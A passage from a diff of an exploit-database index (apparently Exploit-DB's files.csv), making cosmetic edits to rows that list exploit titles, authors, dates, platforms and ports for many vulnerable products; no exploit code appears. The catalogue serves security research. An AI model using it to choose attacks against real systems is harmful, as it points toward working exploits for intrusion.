-34130,7 +34130,7 @@ id,file,description,date,author,platform,type,port 37942,platforms/php/webapps/37942.txt,"SenseSites CommonSense CMS article.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 37943,platforms/php/webapps/37943.txt,"WebTitan 'logs-x.php' Directory Traversal",2012-10-20,"Richard Conner",php,webapps,0 37944,platforms/php/webapps/37944.txt,"vBSEO 'u' parameter Cross Site Scripting",2012-06-16,MegaMan,php,webapps,0 -37945,platforms/php/webapps/37945.txt,"SilverStripe 2.4.x 'BackURL' Parameter URI Redirection",2012-10-15,"Aung Khant",php,webapps,0 +37945,platforms/php/webapps/37945.txt,"SilverStripe 2.4.x - 'BackURL' Parameter URI Redirection",2012-10-15,"Aung Khant",php,webapps,0 37946,platforms/php/webapps/37946.txt,"WordPress Crayon Syntax Highlighter Plugin 'wp_load' Parameter Remote File Include Vulnerabilities",2012-10-15,"Charlie Eriksen",php,webapps,0 38001,platforms/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22 37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - .pls Local Crash PoC",2015-08-17,St0rn,windows,dos,0 @@ -34142,14 +34142,14 @@ id,file,description,date,author,platform,type,port 37804,platforms/php/webapps/37804.txt,"minimal Gallery 'index.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-17,ayastar,php,webapps,0 37805,platforms/php/webapps/37805.txt,"TAGWORX.CMS 'cid' Parameter SQL Injection",2012-09-18,Crim3R,php,webapps,0 37806,platforms/cgi/webapps/37806.txt,"AxisInternet VoIP Manager Multiple Cross Site Scripting Vulnerabilities",2012-09-18,"Benjamin Kunz Mejri",cgi,webapps,0 -37807,platforms/php/webapps/37807.txt,"VBulletin 4.1.12 'blog_plugin_useradmin.php' SQL Injection",2012-09-18,Am!r,php,webapps,0 +37807,platforms/php/webapps/37807.txt,"VBulletin 4.1.12 - 'blog_plugin_useradmin.php' SQL Injection",2012-09-18,Am!r,php,webapps,0 37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0 37809,platforms/php/webapps/37809.php,"Nuts CMS Remote PHP Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80 37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - SEH Overwrite",2015-08-18,Un_N0n,windows,dos,0 37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 Post Auth RCE",2015-08-18,Ebrietas0,php,webapps,80 -37812,platforms/win_x86/remote/37812.rb,"Symantec Endpoint Protection Manager Authentication Bypass and Code Execution",2015-08-18,metasploit,win_x86,remote,8443 -37813,platforms/windows/local/37813.rb,"VideoCharge Studio Buffer Overflow (SEH)",2015-08-18,metasploit,windows,local,0 -37814,platforms/python/remote/37814.rb,"Werkzeug Debug Shell Command Execution",2015-08-18,metasploit,python,remote,0 +37812,platforms/win_x86/remote/37812.rb,"Symantec Endpoint Protection Manager Authentication Bypass and Code Execution",2015-08-18,Metasploit,win_x86,remote,8443 +37813,platforms/windows/local/37813.rb,"VideoCharge Studio Buffer Overflow (SEH)",2015-08-18,Metasploit,windows,local,0 +37814,platforms/python/remote/37814.rb,"Werkzeug Debug Shell Command Execution",2015-08-18,Metasploit,python,remote,0 37817,platforms/php/webapps/37817.txt,"PHPfileNavigator 2.3.3 - XSS Vulnerabilities",2015-08-18,hyp3rlinx,php,webapps,80 37818,platforms/php/webapps/37818.txt,"PHPfileNavigator 2.3.3 - CSRF",2015-08-18,hyp3rlinx,php,webapps,80 37819,platforms/php/webapps/37819.txt,"PHPfileNavigator 2.3.3 - Privilege Escalation",2015-08-18,hyp3rlinx,php,webapps,80 @@ -34254,7 +34254,7 @@ id,file,description,date,author,platform,type,port 37919,platforms/windows/dos/37919.txt,"Windows win32k.sys TTF Font Processing IUP[] Program Instruction Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0 37920,platforms/windows/dos/37920.txt,"Windows ATMFD.DLL Write to Uninitialized Address Due to Malformed CFF Table",2015-08-21,"Google Security Research",windows,dos,0 37921,platforms/windows/dos/37921.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 -37922,platforms/windows/dos/37922.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x34072 / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 +37922,platforms/windows/dos/37922.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x34072 - / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 37923,platforms/windows/dos/37923.txt,"Windows ATMFD.DLL CharString Stream Out-of-Bounds Reads",2015-08-21,"Google Security Research",windows,dos,0 37924,platforms/windows/dos/37924.txt,"Microsoft Office 2007 MSPTLS Heap Index Integer Underflow - MS15-081",2015-08-21,"Google Security Research",windows,dos,0 37925,platforms/windows/local/37925.txt,"Mozilla Maintenance Service Log File Overwrite Elevation of Privilege",2015-08-21,"Google Security Research",windows,local,0 @@ -34274,7 +34274,7 @@ id,file,description,date,author,platform,type,port 37955,platforms/php/webapps/37955.html,"Pligg CMS 2.0.2 - CSRF Add Admin Exploit",2015-08-24,"Arash Khazaei",php,webapps,80 37956,platforms/php/webapps/37956.txt,"WordPress GeoPlaces3 Theme - Arbitrary File Upload Vulnerbility",2015-08-24,Mdn_Newbie,php,webapps,80 37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - (.gas) Crash POC",2015-08-24,Un_N0n,windows,dos,0 -37958,platforms/multiple/remote/37958.rb,"Firefox PDF.js Privileged Javascript Injection",2015-08-24,metasploit,multiple,remote,0 +37958,platforms/multiple/remote/37958.rb,"Firefox PDF.js Privileged Javascript Injection",2015-08-24,Metasploit,multiple,remote,0 37959,platforms/php/webapps/37959.txt,"BSW Gallery 'uploadpic.php' Arbitrary File Upload",2012-10-18,"cr4wl3r ",php,webapps,0 37960,platforms/php/webapps/37960.txt,"Amateur Photographer's Image Gallery force-download.php file Parameter Information Disclosure",2012-10-18,"cr4wl3r ",php,webapps,0 37961,platforms/php/webapps/37961.txt,"Amateur Photographer's Image Gallery plist.php albumid Parameter SQL Injection",2012-10-18,"cr4wl3r ",php,webapps,0 @@ -34284,10 +34284,10 @@ id,file,description,date,author,platform,type,port 37965,platforms/hardware/webapps/37965.txt,"Keeper IP Camera 3.2.2.10 - Authentication Bypass",2015-08-25,"RAT - ThiefKing",hardware,webapps,0 37966,platforms/windows/dos/37966.txt,"Microsoft Office 2007 OneTableDocumentStream Invalid Object",2015-08-25,"Google Security Research",windows,dos,0 37967,platforms/windows/dos/37967.txt,"Microsoft Office 2007 Malformed Document Stack-Based Buffer Overflow",2015-08-25,"Google Security Research",windows,dos,0 -37968,platforms/php/webapps/37968.txt,"CMS Mini 0.2.2 'index.php' Script Cross Site Scripting",2012-10-19,Netsparker,php,webapps,0 +37968,platforms/php/webapps/37968.txt,"CMS Mini 0.2.2 - 'index.php' Script Cross Site Scripting",2012-10-19,Netsparker,php,webapps,0 37969,platforms/hardware/remote/37969.txt,"FirePass <= 7.0 SSL VPN 'refreshURL' Parameter URI Redirection",2012-10-21,"Aung Khant",hardware,remote,0 37970,platforms/php/webapps/37970.html,"WordPress Wordfence Security Plugin Cross Site Scripting",2012-10-18,MustLive,php,webapps,0 -37971,platforms/php/webapps/37971.html,"WHMCS 4.5.2 'googlecheckout.php' SQL Injection",2012-10-22,"Starware Security Team",php,webapps,0 +37971,platforms/php/webapps/37971.html,"WHMCS 4.5.2 - 'googlecheckout.php' SQL Injection",2012-10-22,"Starware Security Team",php,webapps,0 37973,platforms/php/webapps/37973.txt,"SMF 'view' Parameter Cross Site Scripting",2012-10-23,Am!r,php,webapps,0 37974,platforms/php/webapps/37974.txt,"Inventory Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-10-26,G13,php,webapps,0 37975,platforms/linux/local/37975.py,"ZSNES 1.51 - Buffer Overflow",2015-08-26,"Juan Sacco",linux,local,0 @@ -34296,10 +34296,10 @@ id,file,description,date,author,platform,type,port 37978,platforms/php/webapps/37978.txt,"Gramophone 'rs' Parameter Cross Site Scripting",2012-10-25,G13,php,webapps,0 37979,platforms/php/webapps/37979.txt,"VicBlog Multiple SQL Injection Vulnerabilities",2012-10-26,Geek,php,webapps,0 37980,platforms/windows/dos/37980.pl,"Microsoft Office Excel Denial of Service",2012-10-11,"Jean Pascal Pereira",windows,dos,0 -37981,platforms/windows/dos/37981.pl,"Microsoft Paint 5.1 '.bmp' Denial of Service",2012-10-27,coolkaveh,windows,dos,0 +37981,platforms/windows/dos/37981.pl,"Microsoft Paint 5.1 - '.bmp' Denial of Service",2012-10-27,coolkaveh,windows,dos,0 37982,platforms/hardware/remote/37982.pl,"TP-LINK TL-WR841N Router Local File Include",2012-10-29,"Matan Azugi",hardware,remote,0 37983,platforms/php/webapps/37983.php,"EasyITSP 'customers_edit.php' Authentication Security Bypass",2012-10-26,"Michal Blaszczak",php,webapps,0 -37984,platforms/windows/dos/37984.pl,"KMPlayer 3.0.0.1440 '.avi' File Local Denial of Service",2012-10-26,Am!r,windows,dos,0 +37984,platforms/windows/dos/37984.pl,"KMPlayer 3.0.0.1440 - '.avi' File Local Denial of Service",2012-10-26,Am!r,windows,dos,0 37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80 37986,platforms/windows/dos/37986.txt,"Xion Audio Player 1.5 build 155 Stack Based Buffer Overflow",2015-08-27,Un_N0n,windows,dos,0 37987,platforms/linux/local/37987.py,"FENIX 0.92 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0 @@ -34335,7 +34335,7 @@ id,file,description,date,author,platform,type,port 38018,platforms/php/webapps/38018.txt,"WordPress PHP Event Calendar Plugin 'cid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 38019,platforms/php/webapps/38019.txt,"WordPress Eco-annu Plugin 'eid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 38020,platforms/hardware/remote/38020.py,"Multiple Huawei Products Password Encryption Weakness",2012-11-13,"Roberto Paleari",hardware,remote,0 -38021,platforms/multiple/dos/38021.pl,"Media Player Classic <= 1.5 (MPC) WebServer Request Handling Remote DoS",2012-11-16,X-Cisadane,multiple,dos,0 +38021,platforms/multiple/dos/38021.pl,"Media Player Classic <= 1.5 - (MPC) WebServer Request Handling Remote DoS",2012-11-16,X-Cisadane,multiple,dos,0 38022,platforms/php/webapps/38022.txt,"WordPress Dailyedition-mouss Theme 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 38023,platforms/php/webapps/38023.txt,"WordPress Tagged Albums Plugin 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 38024,platforms/php/webapps/38024.txt,"WebKit Cross Site Scripting Filter 'XSSAuditor.cpp' Security Bypass",2012-07-19,"Tushar Dalvi",php,webapps,0 @@ -34349,7 +34349,7 @@ id,file,description,date,author,platform,type,port 38032,platforms/ios/dos/38032.pl,"Viber 4.2.0 - Non-Printable Characters Handling Denial of Service",2015-08-31,"Mohammad Reza Espargham",ios,dos,0 38034,platforms/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP - 10.6.2 MR-1 - Blind SQL Injection",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps,0 38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0 -38036,platforms/osx/local/38036.rb,"Apple OS X Entitlements Rootpipe Privilege Escalation",2015-08-31,metasploit,osx,local,0 +38036,platforms/osx/local/38036.rb,"Apple OS X Entitlements Rootpipe Privilege Escalation",2015-08-31,Metasploit,osx,local,0 38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 Cross Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0 38038,platforms/multiple/dos/38038.txt,"Splunk <= 4.3.1 Denial of Service",2012-11-19,"Alexander Klink",multiple,dos,0 38039,platforms/php/webapps/38039.txt,"openSIS 'modname' Parameter Local File Include",2012-11-20,"Julian Horoszkiewicz",php,webapps,0 @@ -34406,7 +34406,7 @@ id,file,description,date,author,platform,type,port 38137,platforms/osx/local/38137.txt,"OS X Install.framework Arbitrary mkdir_ unlink and chown to admin Group",2015-09-10,"Google Security Research",osx,local,0 38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0 -38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy Password Change Command Injection",2015-09-07,metasploit,linux,remote,10443 +38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy Password Change Command Injection",2015-09-07,Metasploit,linux,remote,10443 38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80 38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,jsp,webapps,8081 38105,platforms/php/webapps/38105.txt,"WordPress White-Label Framework 2.0.6 - XSS",2015-09-08,Outlasted,php,webapps,80 @@ -34492,8 +34492,8 @@ id,file,description,date,author,platform,type,port 38191,platforms/jsp/webapps/38191.txt,"Openfire 3.10.2 - Multiple XSS Vulnerabilities",2015-09-15,hyp3rlinx,jsp,webapps,80 38192,platforms/jsp/webapps/38192.txt,"Openfire 3.10.2 - CSRF Vulnerabilities",2015-09-15,hyp3rlinx,jsp,webapps,80 38194,platforms/android/shellcode/38194.c,"Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0 -38195,platforms/windows/remote/38195.rb,"MS15-100 Microsoft Windows Media Center MCL",2015-09-15,metasploit,windows,remote,0 -38196,platforms/php/remote/38196.rb,"CMS Bolt File Upload",2015-09-15,metasploit,php,remote,80 +38195,platforms/windows/remote/38195.rb,"MS15-100 Microsoft Windows Media Center MCL",2015-09-15,Metasploit,windows,remote,0 +38196,platforms/php/remote/38196.rb,"CMS Bolt File Upload",2015-09-15,Metasploit,php,remote,80 38197,platforms/php/webapps/38197.txt,"Silver Peak VXOA < 6.2.11 - Multiple Vulnerabilities",2015-09-15,Security-Assessment.com,php,webapps,80 38198,platforms/windows/local/38198.txt,"Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38199,platforms/windows/local/38199.txt,"Windows NtUserGetClipboardAccessToken Token Leak",2015-09-15,"Google Security Research",windows,local,0 @@ -34516,8 +34516,8 @@ id,file,description,date,author,platform,type,port 38218,platforms/windows/local/38218.py,"IKEView.exe R60 - .elg Local SEH Exploit",2015-09-17,cor3sm4sh3r,windows,local,0 38219,platforms/windows/local/38219.py,"ZTE PC UI USB Modem Software - Buffer Overflow",2015-09-17,R-73eN,windows,local,0 38220,platforms/windows/local/38220.py,"IKEView R60 - Buffer Overflow Local Exploit (SEH)",2015-09-17,VIKRAMADITYA,windows,local,0 -38221,platforms/java/remote/38221.rb,"ManageEngine OpManager Remote Code Execution",2015-09-17,metasploit,java,remote,0 -38222,platforms/win_x86-64/local/38222.rb,"Microsoft Windows - Font Driver Buffer Overflow (MS15-078)",2015-09-17,metasploit,win_x86-64,local,0 +38221,platforms/java/remote/38221.rb,"ManageEngine OpManager Remote Code Execution",2015-09-17,Metasploit,java,remote,0 +38222,platforms/win_x86-64/local/38222.rb,"Microsoft Windows - Font Driver Buffer Overflow (MS15-078)",2015-09-17,Metasploit,win_x86-64,local,0 38223,platforms/php/webapps/38223.txt,"ZeusCart 4.0 - CSRF",2015-09-17,"Curesec Research Team",php,webapps,80 38224,platforms/php/webapps/38224.txt,"ZeusCart 4.0 - SQL Injection",2015-09-17,"Curesec Research Team",php,webapps,80 38225,platforms/windows/dos/38225.txt,"VBox Satellite Express 2.3.17.3 - Arbitrary Write",2015-09-17,KoreLogic,windows,dos,0 @@ -34547,7 +34547,7 @@ id,file,description,date,author,platform,type,port 38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0 38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin 'id' Parameter Cross Site Scripting",2013-01-24,hiphop,php,webapps,0 38252,platforms/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,windows,remote,21 -38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow",2015-09-21,metasploit,windows,remote,21 +38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow",2015-09-21,Metasploit,windows,remote,21 38255,platforms/php/webapps/38255.txt,"Kirby CMS <= 2.1.0 - Authentication Bypass",2015-09-22,"Dawid Golunski",php,webapps,80 38259,platforms/windows/dos/38259.py,"MASM32 11R - Crash POC",2015-09-22,VIKRAMADITYA,windows,dos,0 38260,platforms/windows/remote/38260.php,"Konica Minolta FTP Utility 1.0 - Directory Traversal",2015-09-22,shinnai,windows,remote,21 @@ -34583,15 +34583,15 @@ id,file,description,date,author,platform,type,port 38290,platforms/php/webapps/38290.txt,"WordPress flashnews Theme Multiple Input Validation Vulnerabilities",2013-02-02,MustLive,php,webapps,0 38291,platforms/php/webapps/38291.txt,"EasyITSP 'voicemail.php' Directory Traversal",2013-02-04,"Michal Blaszczak",php,webapps,0 38292,platforms/php/webapps/38292.txt,"refbase <= 0.9.6 - Multiple Vulnerabilities",2015-09-23,"Mohab Ali",php,webapps,0 -38294,platforms/php/webapps/38294.txt,"ezStats2 'style.php' Local File Include",2013-02-06,L0n3ly-H34rT,php,webapps,0 -38295,platforms/php/webapps/38295.txt,"ezStats for Battlefield 3 /ezStats2/compare.php Multiple Parameter XSS",2013-02-06,L0n3ly-H34rT,php,webapps,0 +38294,platforms/php/webapps/38294.txt,"ezStats2 - 'style.php' Local File Include",2013-02-06,L0n3ly-H34rT,php,webapps,0 +38295,platforms/php/webapps/38295.txt,"ezStats for Battlefield 3 - /ezStats2/compare.php Multiple Parameter XSS",2013-02-06,L0n3ly-H34rT,php,webapps,0 38296,platforms/php/webapps/38296.txt,"WordPress CommentLuv Plugin '_ajax_nonce' Parameter Cross Site Scripting",2013-02-06,"High-Tech Bridge",php,webapps,0 38297,platforms/php/webapps/38297.txt,"WordPress Wysija Newsletters Plugin Multiple SQL Injection Vulnerabilities",2013-02-06,"High-Tech Bridge",php,webapps,0 38298,platforms/linux/local/38298.txt,"xNBD '/tmp/xnbd.log' Insecure Temporary File Handling",2013-02-06,"Sebastian Pipping",linux,local,0 38299,platforms/windows/local/38299.c,"Symantec Encryption Desktop 10 Local Buffer Overflow Privilege Escalation",2012-02-25,"Nikita Tarakanov",windows,local,0 38300,platforms/php/webapps/38300.txt,"WordPress Audio Player Plugin 'playerID' Parameter Cross Site Scripting",2013-01-31,hiphop,php,webapps,0 38301,platforms/php/webapps/38301.txt,"WordPress Pinboard Theme 'tab' Parameter Cross Site Scripting",2013-02-09,"Henrique Montenegro",php,webapps,0 -38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot - Remote Code Execution",2015-09-23,metasploit,multiple,remote,6667 +38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot - Remote Code Execution",2015-09-23,Metasploit,multiple,remote,6667 38303,platforms/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Privilege Escalation via DMG Install Script",2015-09-23,"Yorick Koster",osx,local,0 38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) <= 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0 38447,platforms/multiple/local/38447.pl,"libsndfile 1.0.25 - Heap Overflow",2015-10-13,"Marco Romano",multiple,local,0 @@ -34617,7 +34617,7 @@ id,file,description,date,author,platform,type,port 38326,platforms/php/webapps/38326.txt,"Zenphoto 'index.php' SQL Injection",2013-02-20,HosseinNsn,php,webapps,0 38327,platforms/php/webapps/38327.txt,"PHPmyGallery 1.5 Local File Disclosure and Cross Site Scripting Vulnerabilities",2013-02-21,TheMirkin,php,webapps,0 38328,platforms/php/webapps/38328.txt,"OpenEMR 'site' Parameter Cross Site Scripting",2013-02-21,"Gjoko Krstic",php,webapps,0 -38329,platforms/php/webapps/38329.txt,"ZeroClipboard 1.9.x 'id' Parameter Cross Site Scripting",2013-02-20,MustLive,php,webapps,0 +38329,platforms/php/webapps/38329.txt,"ZeroClipboard 1.9.x - 'id' Parameter Cross Site Scripting",2013-02-20,MustLive,php,webapps,0 38330,platforms/windows/remote/38330.txt,"Photodex ProShow Producer Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-02-23,"Julien Ahrens",windows,remote,0 38331,platforms/php/webapps/38331.txt,"WordPress Smart Flv Plugin 'jwplayer.swf' Multiple Cross Site Scripting Vulnerabilities",2013-02-25,"Henri Salo",php,webapps,0 38332,platforms/php/webapps/38332.txt,"Batavi 'index.php' Cross Site Scripting",2013-03-01,Dognaedis,php,webapps,0 @@ -34634,13 +34634,13 @@ id,file,description,date,author,platform,type,port 38343,platforms/ios/webapps/38343.txt,"Photos in Wifi 1.0.1 iOS - Arbitrary File Upload",2015-09-28,Vulnerability-Lab,ios,webapps,0 38344,platforms/windows/dos/38344.txt,"Adobe Acrobat Reader AFParseDate Javascript API Restrictions Bypass",2015-09-28,"Reigning Shells",windows,dos,0 38345,platforms/php/webapps/38345.txt,"Vtiger CRM <= 6.3.0 Authenticated Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",php,webapps,80 -38346,platforms/bsd/remote/38346.rb,"Watchguard XCS Remote Command Execution",2015-09-28,metasploit,bsd,remote,443 -38347,platforms/bsd/local/38347.rb,"Watchguard XCS FixCorruptMail Local Privilege Escalation",2015-09-28,metasploit,bsd,local,443 +38346,platforms/bsd/remote/38346.rb,"Watchguard XCS Remote Command Execution",2015-09-28,Metasploit,bsd,remote,443 +38347,platforms/bsd/local/38347.rb,"Watchguard XCS FixCorruptMail Local Privilege Escalation",2015-09-28,Metasploit,bsd,local,443 38348,platforms/windows/dos/38348.txt,"Adobe Flash - No Checks on Vector. Capacity Field",2015-09-28,"Google Security Research",windows,dos,0 38349,platforms/windows/local/38349.py,"IconLover 5.42 - Local Buffer Overflow Exploit",2015-09-29,cor3sm4sh3r,windows,local,0 38350,platforms/hardware/webapps/38350.txt,"Western Digital My Cloud 04.01.03-421_ 04.01.04-422 - Command Injection",2015-09-29,absane,hardware,webapps,0 38351,platforms/asp/webapps/38351.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (2)",2015-09-29,"Pedro Ribeiro",asp,webapps,0 -38352,platforms/windows/remote/38352.rb,"ManageEngine EventLog Analyzer Remote Code Execution",2015-09-29,metasploit,windows,remote,8400 +38352,platforms/windows/remote/38352.rb,"ManageEngine EventLog Analyzer Remote Code Execution",2015-09-29,Metasploit,windows,remote,8400 38353,platforms/linux/local/38353.txt,"Ubuntu Apport - Local Privilege Escalation",2015-09-29,halfdog,linux,local,0 38354,platforms/php/webapps/38354.txt,"Plogger Multiple Input Validation Vulnerabilities",2013-03-02,"Saadat Ullah",php,webapps,0 38355,platforms/php/webapps/38355.txt,"WordPress Uploader Plugin 'blog' Parameter Cross Site Scripting",2013-03-01,CodeV,php,webapps,0 @@ -34649,8 +34649,8 @@ id,file,description,date,author,platform,type,port 38358,platforms/java/webapps/38358.txt,"HP Intelligent Management Center 'topoContent.jsf' Cross Site Scripting",2013-03-04,"Julien Ahrens",java,webapps,0 38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin 'daytoshow' Parameter Cross Site Scripting",2013-03-05,alejandr0.m0f0,php,webapps,0 38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0 -38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel Remote Code Execution",2015-10-05,metasploit,multiple,remote,0 -38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload",2015-10-05,metasploit,windows,remote,0 +38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel Remote Code Execution",2015-10-05,Metasploit,multiple,remote,0 +38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload",2015-10-05,Metasploit,windows,remote,0 38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0 38363,platforms/php/webapps/38363.txt,"File Manager HTML Injection and Local File Include Vulnerabilities",2013-02-23,"Benjamin Kunz Mejri",php,webapps,0 38364,platforms/multiple/dos/38364.txt,"Varnish Cache Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,multiple,dos,0 @@ -34684,7 +34684,7 @@ id,file,description,date,author,platform,type,port 38393,platforms/php/webapps/38393.html,"WordPress Occasions Plugin Cross Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 38394,platforms/windows/remote/38394.py,"BlazeVideo HDTV Player Standard '.PLF' File Remote Buffer Overflow",2013-03-19,metacom,windows,remote,0 38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080 -38536,platforms/hardware/remote/38536.txt,"Barracuda SSL VPN 680 'returnTo' Parameter Open Redirection",2013-05-27,"Chokri Ben Achor",hardware,remote,0 +38536,platforms/hardware/remote/38536.txt,"Barracuda SSL VPN 680 - 'returnTo' Parameter Open Redirection",2013-05-27,"Chokri Ben Achor",hardware,remote,0 38537,platforms/php/webapps/38537.txt,"WordPress ADIF Log Search Widget Plugin 'logbook_search.php' Cross Site Scripting",2013-05-27,k3170makan,php,webapps,0 38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0 38400,platforms/php/webapps/38400.txt,"AlienVault OSSIM 4.3 - CSRF Vulnerabilities",2015-10-05,"MohamadReza Mohajerani",php,webapps,0 @@ -34697,16 +34697,16 @@ id,file,description,date,author,platform,type,port 38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0 38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0 38411,platforms/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - CSRF Vulnerabilities",2015-10-07,hyp3rlinx,python,webapps,0 -38412,platforms/multiple/remote/38412.txt,"IBM Lotus Domino 8.5.x 'x.nsf' Multiple Cross Site Scripting Vulnerabilities",2013-03-26,MustLive,multiple,remote,0 +38412,platforms/multiple/remote/38412.txt,"IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross Site Scripting Vulnerabilities",2013-03-26,MustLive,multiple,remote,0 38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory Multiple Cross Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0 38414,platforms/php/webapps/38414.txt,"WordPress Feedweb Plugin 'wp_post_id' Parameter Cross Site Scripting",2013-03-30,"Stefan Schurtz",php,webapps,0 38415,platforms/asp/webapps/38415.txt,"C2 WebResource 'File' Parameter Cross Site Scripting",2013-04-03,anonymous,asp,webapps,0 -38416,platforms/php/webapps/38416.txt,"e107 'content_preset.php' Cross Site Scripting",2013-04-03,"Simon Bieber",php,webapps,0 +38416,platforms/php/webapps/38416.txt,"e107 - 'content_preset.php' Cross Site Scripting",2013-04-03,"Simon Bieber",php,webapps,0 38417,platforms/php/webapps/38417.txt,"Symphony 'sort' Parameter SQL Injection",2013-04-03,"High-Tech Bridge",php,webapps,0 38418,platforms/php/webapps/38418.txt,"FUDforum Multiple Remote PHP Code Injection Vulnerabilities",2013-04-03,"High-Tech Bridge",php,webapps,0 38419,platforms/windows/dos/38419.txt,"SmallFTPD Unspecified Denial of Service",2013-04-03,AkaStep,windows,dos,0 38420,platforms/multiple/dos/38420.txt,"Google Chrome Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0 -38421,platforms/linux/dos/38421.txt,"Apache Subversion 1.6.x 'mod_dav_svn/lock.c' Remote Denial of Service",2013-04-05,anonymous,linux,dos,0 +38421,platforms/linux/dos/38421.txt,"Apache Subversion 1.6.x - 'mod_dav_svn/lock.c' Remote Denial of Service",2013-04-05,anonymous,linux,dos,0 38422,platforms/linux/dos/38422.txt,"Apache Subversion Remote Denial of Service",2013-04-05,"Greg McMullin",linux,dos,0 38423,platforms/windows/local/38423.py,"VeryPDF Image2PDF Converter SEH Buffer Overflow",2015-10-08,"Robbie Corley",windows,local,0 38424,platforms/multiple/webapps/38424.txt,"Kallithea 0.2.9 - (came_from) HTTP Response Splitting",2015-10-08,LiquidWorm,multiple,webapps,0 @@ -34769,7 +34769,7 @@ id,file,description,date,author,platform,type,port 38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - 